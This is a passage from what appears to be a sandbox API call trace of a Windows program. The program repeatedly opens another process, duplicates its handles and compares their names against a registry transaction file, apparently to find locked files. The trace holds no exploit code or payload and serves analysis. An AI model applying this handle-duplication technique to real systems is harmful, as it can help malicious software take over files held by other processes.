bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.903] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.903] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.904] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.904] CloseHandle (hObject=0x670) returned 1 [0153.904] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -10 [0153.904] CloseHandle (hObject=0x680) returned 1 [0153.904] CloseHandle (hObject=0x62c) returned 1 [0153.904] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.904] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.905] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.905] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.905] CloseHandle (hObject=0x670) returned 1 [0153.905] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0153.905] CloseHandle (hObject=0x680) returned 1 [0153.905] CloseHandle (hObject=0x62c) returned 1 [0153.905] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.905] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.906] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.906] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.907] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.907] CloseHandle (hObject=0x670) returned 1 [0153.907] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0153.907] CloseHandle (hObject=0x680) returned 1 [0153.907] CloseHandle (hObject=0x62c) returned 1 [0153.907] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.907] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.908] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.908] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.909] CloseHandle (hObject=0x670) returned 1 [0153.909] _wcsicmp (_Str1="\\wdmaud.drv.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.909] CloseHandle (hObject=0x680) returned 1 [0153.909] CloseHandle (hObject=0x62c) returned 1 [0153.909] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.909] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.910] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.910] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.910] CloseHandle (hObject=0x670) returned 1 [0153.910] _wcsicmp (_Str1="\\MMDevAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.910] CloseHandle (hObject=0x680) returned 1 [0153.910] CloseHandle (hObject=0x62c) returned 1 [0153.910] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.910] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x654, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.911] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.912] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.912] CloseHandle (hObject=0x670) returned 1 [0153.912] _wcsicmp (_Str1="\\bthprops.cpl.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -12 [0153.912] CloseHandle (hObject=0x680) returned 1 [0153.912] CloseHandle (hObject=0x62c) returned 1 [0153.912] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.912] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x664, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.912] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.913] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.913] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.913] CloseHandle (hObject=0x670) returned 1 [0153.913] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.914] CloseHandle (hObject=0x680) returned 1 [0153.914] CloseHandle (hObject=0x62c) returned 1 [0153.914] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.914] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x69c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.914] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.915] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.915] CloseHandle (hObject=0x670) returned 1 [0153.915] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.915] CloseHandle (hObject=0x680) returned 1 [0153.915] CloseHandle (hObject=0x62c) returned 1 [0153.915] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.915] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.915] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.916] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.917] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.917] CloseHandle (hObject=0x670) returned 1 [0153.917] _wcsicmp (_Str1="\\msutb.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.917] CloseHandle (hObject=0x680) returned 1 [0153.917] CloseHandle (hObject=0x62c) returned 1 [0153.917] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.917] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.918] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.918] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.918] CloseHandle (hObject=0x670) returned 1 [0153.919] _wcsicmp (_Str1="\\msctf.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.919] CloseHandle (hObject=0x680) returned 1 [0153.919] CloseHandle (hObject=0x62c) returned 1 [0153.919] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.919] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.919] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.920] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.920] CloseHandle (hObject=0x670) returned 1 [0153.920] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.920] CloseHandle (hObject=0x680) returned 1 [0153.920] CloseHandle (hObject=0x62c) returned 1 [0153.920] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.920] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.921] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.922] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.922] CloseHandle (hObject=0x670) returned 1 [0153.922] CloseHandle (hObject=0x680) returned 1 [0153.922] CloseHandle (hObject=0x62c) returned 1 [0153.922] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.922] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.923] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.923] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.923] CloseHandle (hObject=0x670) returned 1 [0153.923] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.923] CloseHandle (hObject=0x680) returned 1 [0153.923] CloseHandle (hObject=0x62c) returned 1 [0153.924] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.924] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.924] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.925] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.925] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.925] CloseHandle (hObject=0x670) returned 1 [0153.925] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.925] CloseHandle (hObject=0x680) returned 1 [0153.925] CloseHandle (hObject=0x62c) returned 1 [0153.926] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.926] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.926] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.927] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.927] CloseHandle (hObject=0x670) returned 1 [0153.927] _wcsicmp (_Str1="\\Printer Shortcuts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.927] CloseHandle (hObject=0x680) returned 1 [0153.927] CloseHandle (hObject=0x62c) returned 1 [0153.927] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.927] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x854, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.927] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.928] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.929] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.929] CloseHandle (hObject=0x670) returned 1 [0153.929] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.929] CloseHandle (hObject=0x680) returned 1 [0153.929] CloseHandle (hObject=0x62c) returned 1 [0153.929] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.929] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x87c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.930] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.930] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.930] CloseHandle (hObject=0x670) returned 1 [0153.930] _wcsicmp (_Str1="\\netshell.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -15 [0153.930] CloseHandle (hObject=0x680) returned 1 [0153.930] CloseHandle (hObject=0x62c) returned 1 [0153.930] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.931] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x8ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.931] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.932] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.932] CloseHandle (hObject=0x670) returned 1 [0153.932] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.932] CloseHandle (hObject=0x680) returned 1 [0153.932] CloseHandle (hObject=0x62c) returned 1 [0153.932] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.932] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.933] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.935] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.935] CloseHandle (hObject=0x670) returned 1 [0153.935] CloseHandle (hObject=0x680) returned 1 [0153.935] CloseHandle (hObject=0x62c) returned 1 [0153.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.935] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.936] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.937] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.937] CloseHandle (hObject=0x670) returned 1 [0153.937] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.937] CloseHandle (hObject=0x680) returned 1 [0153.937] CloseHandle (hObject=0x62c) returned 1 [0153.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.937] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.938] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.939] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.939] CloseHandle (hObject=0x670) returned 1 [0153.939] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.939] CloseHandle (hObject=0x680) returned 1 [0153.939] CloseHandle (hObject=0x62c) returned 1 [0153.939] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.939] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.940] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.940] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.940] CloseHandle (hObject=0x670) returned 1 [0153.940] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.940] CloseHandle (hObject=0x680) returned 1 [0153.940] CloseHandle (hObject=0x62c) returned 1 [0153.940] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.940] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.941] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.942] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.942] CloseHandle (hObject=0x670) returned 1 [0153.942] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.942] CloseHandle (hObject=0x680) returned 1 [0153.942] CloseHandle (hObject=0x62c) returned 1 [0153.942] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.942] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.942] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.943] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.943] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.944] CloseHandle (hObject=0x670) returned 1 [0153.944] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.944] CloseHandle (hObject=0x680) returned 1 [0153.944] CloseHandle (hObject=0x62c) returned 1 [0153.944] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.944] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.944] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.945] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.945] CloseHandle (hObject=0x670) returned 1 [0153.945] _wcsicmp 